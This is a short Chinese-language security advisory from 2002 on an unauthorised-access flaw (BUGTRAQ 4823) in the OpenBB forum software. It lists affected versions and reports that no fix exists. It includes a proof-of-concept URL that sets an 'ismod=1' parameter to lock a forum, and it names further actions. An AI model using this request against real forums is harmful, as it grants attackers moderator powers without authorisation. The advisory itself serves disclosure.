|
|
OpenBB存在未授权访问漏洞
发布时间:2002-05-28
更新时间:2002-05-28
严重程度:高
威胁程度:控制应用程序系统
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:4823
受影响系统OpenBB OpenBB 1.0 .0 RC3
OpenBB OpenBB 1.0 .0 RC2
- Apache Software Foundation Apache 1.3.17
- Apache Software Foundation Apache 1.3.18
- Apache Software Foundation Apache 1.3.19
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22
OpenBB OpenBB 1.0 .0 RC1
- Apache Software Foundation Apache 1.3.17
- Apache Software Foundation Apache 1.3.18
- Apache Software Foundation Apache 1.3.19
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.22 详细描述
OpenBB是WEB论坛程序,可使用在多种系统平台下。
OpenBB存在漏洞允许未授权用户获得管理员或者版主的权利访问论坛,攻击者只要通过更改论坛的几个属性,并使用URL请求就可以获得。
测试代码
http://www.site.com/moderator.php?action=lock&TID=LIDDUFORUM&ismod=1
这会锁住论坛,其他还有'action=sticky' or 'action=important'关键词。
解决方案
尚无
相关信息
frog frog <leseulfrog@hotmail.com>.
|
